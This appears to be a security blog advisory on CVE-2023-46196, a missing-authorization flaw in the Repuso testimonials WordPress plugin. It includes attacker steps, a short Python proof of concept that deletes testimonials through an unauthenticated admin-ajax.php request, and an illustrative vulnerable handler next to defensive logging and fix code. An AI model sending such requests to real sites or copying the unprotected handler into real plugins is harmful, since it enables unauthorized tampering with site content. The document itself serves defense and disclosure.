CVE-2023-46196 - Missing Authorization in Repuso Social Proof Testimonials and Reviews Plugin – Exploit Details and Defense Guide
In the fast-moving world of WordPress plugins, security flaws can open the door to serious exploits, sometimes without anyone noticing at first. CVE-2023-46196 is a real-world example: a missing authorization vulnerability in the “Social proof testimonials and reviews by Repuso” plugin, which is widely used by websites that want to display positive customer feedback. This post looks at what went wrong, how the exploit works, and what steps you can take to stay safe.
- Version: All versions up to and including 4.97
- Issue: Missing authorization for sensitive actions (due to incorrectly configured access control security levels)
This means that certain plugin functions could be reached by anyone, not just by site administrators or logged-in users as you would expect.
Why is This a Problem?
WordPress plugins should always check if the current user has the right level of permission before letting them do important stuff (like changing settings or deleting testimonials). When those checks are missing, attackers can jump in and mess with your website.
In simple terms:
*Anyone, including hackers and bots, could potentially trigger privileged actions they are NOT supposed to have access to.*
Step 1: Scanning for Vulnerable Sites
Attackers look for websites running the Repuso plugin (up to version 4.97).
Public web scanners or even Google dorks can help them find vulnerable websites with the Repuso widget or admin links.
Step 2: Identifying Unprotected Endpoints
The plugin exposes several AJAX (admin-ajax.php) or REST API endpoints that *should* be protected. Due to this vulnerability, no proper authorization checks are in place.
Step 3: Crafting Exploit Requests
Attackers can directly call plugin endpoints without authentication or proper user capability checks, leading to unauthorized actions such as deleting testimonials, injecting fake ones, or changing widget settings:
Sample Exploit Code
Let’s look at a hypothetical (but realistic) exploit code snippet in Python, assuming the plugin exposes an unprotected AJAX action called repuso_delete_testimonial.
```python
import requests

# REPLACE 'https://victim.com' with the target site
url = 'https://victim.com/wp-admin/admin-ajax.php'

# admin-ajax.php dispatches on the 'action' field; no cookie or nonce is sent
data = {
    'action': 'repuso_delete_testimonial',
    'testimonial_id': 1234  # Example testimonial ID to delete
}

response = requests.post(url, data=data)

if response.status_code == 200:
    print("Exploit sent successfully!")
else:
    print("Exploit failed. Status:", response.status_code)
```
*This code does NOT require any login information!*
Anyone can send this POST request and delete testimonials if the endpoint is left unprotected.
- Spammers could inject fake testimonials to harm your reputation.
- Trolls might override widget display settings, breaking your site’s social proof or redirecting users.
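From the defender's side, the first question is whether requests like the one above are actually reaching your site. The following is an added example (not code from the original post or from the Repuso plugin): a small must-use plugin that records every anonymous admin-ajax.php call whose action name starts with a plugin's prefix. The prefix `repuso_`, the constant and function names, and the log format are assumptions made for this example; the post itself only names a hypothetical `repuso_delete_testimonial` action.

```php
<?php
/**
 * Plugin Name: Log anonymous plugin AJAX calls (added example, not Repuso code)
 * Description: Drop this file into wp-content/mu-plugins/ to record
 *              admin-ajax.php requests from logged-out visitors that target
 *              a given plugin action prefix.
 */

// Assumption: the plugin's AJAX actions share the prefix "repuso_".
// Adjust to the real prefix once you have confirmed it in the plugin source.
const ANON_AJAX_WATCH_PREFIX = 'repuso_';

/**
 * Decide whether a request is worth logging: an admin-ajax.php call with no
 * logged-in user whose action name starts with the watched prefix.
 * Kept free of WordPress calls so the rule itself is easy to reason about.
 */
function anon_ajax_should_log( bool $doing_ajax, bool $logged_in, string $action, string $prefix ): bool {
    if ( ! $doing_ajax || $logged_in ) {
        return false;
    }
    return $action !== '' && strncmp( $action, $prefix, strlen( $prefix ) ) === 0;
}

/**
 * Build one log line. Only request metadata is recorded, never the body.
 */
function anon_ajax_log_line( string $action, string $ip, string $method, string $ua ): string {
    return sprintf(
        '[%s] anonymous admin-ajax call action=%s method=%s ip=%s ua=%s',
        gmdate( 'c' ),
        $action,
        $method,
        $ip,
        substr( $ua, 0, 120 )
    );
}

// admin-ajax.php defines DOING_AJAX before loading WordPress, so by the time
// 'init' fires wp_doing_ajax() and is_user_logged_in() are both reliable.
add_action( 'init', function () {
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : '';
    if ( ! anon_ajax_should_log( wp_doing_ajax(), is_user_logged_in(), $action, ANON_AJAX_WATCH_PREFIX ) ) {
        return;
    }
    $ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
    $method = isset( $_SERVER['REQUEST_METHOD'] ) ? sanitize_key( $_SERVER['REQUEST_METHOD'] ) : 'unknown';
    $ua     = isset( $_SERVER['HTTP_USER_AGENT'] ) ? sanitize_text_field( wp_unslash( $_SERVER['HTTP_USER_AGENT'] ) ) : '';
    error_log( anon_ajax_log_line( $action, $ip, $method, $ua ) );
}, 1 );
```

Lines go to PHP's error log (or to wp-content/debug.log when WP_DEBUG_LOG is enabled). Keep in mind that front-end widgets legitimately use `wp_ajax_nopriv_` hooks, so an anonymous call is not malicious on its own; the signal worth alerting on is an anonymous request to an action that should only ever originate from the admin screen, such as a delete or settings-update action.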
Here's how the vulnerability is tracked in official databases:
- NVD Entry – CVE-2023-46196 (nvd.nist.gov)
- WPScan Advisory
- Plugin Directory (Repuso)
Description:
> “Missing Authorization vulnerability in Repuso Social proof testimonials and reviews… allows exploiting incorrectly configured access control security levels. This issue affects all plugin versions up to and including 4.97.”
1. Update the Plugin: As soon as a patch is offered, update Repuso to the latest version.
2. Disable/Remove If Unneeded:
3. Limit Public Admin-AJAX Calls: Restrict access to AJAX and REST endpoints using security plugins (like Wordfence), .htaccess rules, or web server/WAF rules.
A proper fix would look like this inside the plugin code:
```php
// Abort unless the caller holds the manage_options capability (administrators);
// wp_send_json_error() emits a JSON error and stops execution.
if ( ! current_user_can( 'manage_options' ) ) {
    wp_send_json_error( 'Unauthorized' );
}
```
*This PHP snippet checks that the current user has the `manage_options` capability (held by administrators) before the sensitive action runs; otherwise it returns a JSON error and stops.*
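To make the fix concrete, here is an added example (my own code, not Repuso's) that places the vulnerable pattern beside a hardened handler for the hypothetical `repuso_delete_testimonial` action used in the exploit snippet above. The nonce name `repuso_admin_nonce`, the `repuso_testimonial` post type, the script handle and the file path are all assumptions made for illustration.

```php
<?php
// Added example (not Repuso's code). Shows the missing-authorization pattern
// behind CVE-2023-46196 next to a hardened replacement. The action name
// "repuso_delete_testimonial" is the hypothetical one from the post above.

/* --- Vulnerable pattern: exposed to anonymous callers, no capability check --- */

function repuso_delete_testimonial_vulnerable() {
    $id = isset( $_POST['testimonial_id'] ) ? absint( $_POST['testimonial_id'] ) : 0;
    // Nothing here asks who the caller is: any POST to admin-ajax.php succeeds.
    wp_delete_post( $id, true );
    wp_send_json_success( array( 'deleted' => $id ) );
}
// Registering on wp_ajax_nopriv_* hands the handler to logged-out visitors.
// Left commented out here so the hardened handler below is the one that runs.
// add_action( 'wp_ajax_repuso_delete_testimonial',        'repuso_delete_testimonial_vulnerable' );
// add_action( 'wp_ajax_nopriv_repuso_delete_testimonial', 'repuso_delete_testimonial_vulnerable' );

/* --- Hardened pattern: privileged hook only, capability check, nonce (CSRF) check --- */

function repuso_delete_testimonial_hardened() {
    // 1. Authorization: the caller must hold the capability this action needs.
    //    Needed even on wp_ajax_* because any logged-in role reaches that hook.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Unauthorized', 403 );
    }

    // 2. CSRF protection: the request must carry a nonce minted for this action
    //    ('repuso_admin_nonce' is an assumed name); check_ajax_referer() dies on failure.
    check_ajax_referer( 'repuso_admin_nonce', 'nonce' );

    // 3. Input validation: a positive integer ID of the expected post type
    //    ('repuso_testimonial' is an assumed post type name).
    $id = isset( $_POST['testimonial_id'] ) ? absint( $_POST['testimonial_id'] ) : 0;
    if ( 0 === $id || 'repuso_testimonial' !== get_post_type( $id ) ) {
        wp_send_json_error( 'Invalid testimonial id', 400 );
    }

    if ( ! wp_delete_post( $id, true ) ) {
        wp_send_json_error( 'Delete failed', 500 );
    }
    wp_send_json_success( array( 'deleted' => $id ) );
}
// Only the authenticated hook is registered; there is deliberately no nopriv variant.
add_action( 'wp_ajax_repuso_delete_testimonial', 'repuso_delete_testimonial_hardened' );

/* --- Admin side: hand the nonce to the admin page script so legitimate calls succeed --- */

add_action( 'admin_enqueue_scripts', function () {
    // The 'repuso-admin' handle and admin.js path are assumptions for this example.
    wp_enqueue_script( 'repuso-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'repuso-admin', 'repusoAdmin', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'repuso_admin_nonce' ),
    ) );
} );
```

Three separate controls are doing three separate jobs here: dropping the `wp_ajax_nopriv_` registration keeps logged-out visitors away from the handler entirely, `current_user_can()` stops a logged-in subscriber from reaching an administrator-only action, and the nonce stops a cross-site request from riding on an administrator's session. Removing any one of them re-opens a different path to the same delete.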
Conclusion
CVE-2023-46196 is a classic example of what happens when plugins skip user authorization checks. If you use Repuso’s Social Proof Testimonials plugin, review your site and always keep plugins updated. Never trust public endpoints that don’t verify user roles—because someone else might exploit that trust.
Stay secure, patch often, and review your WordPress plugin permissions regularly!
References & Further Reading
- CVE-2023-46196 NVD Entry
- WPScan Vulnerability Advisory
- Repuso Plugin on WordPress.org
- OWASP: Broken Access Control
Timeline
Published on: 01/02/2025 12:15:11 UTC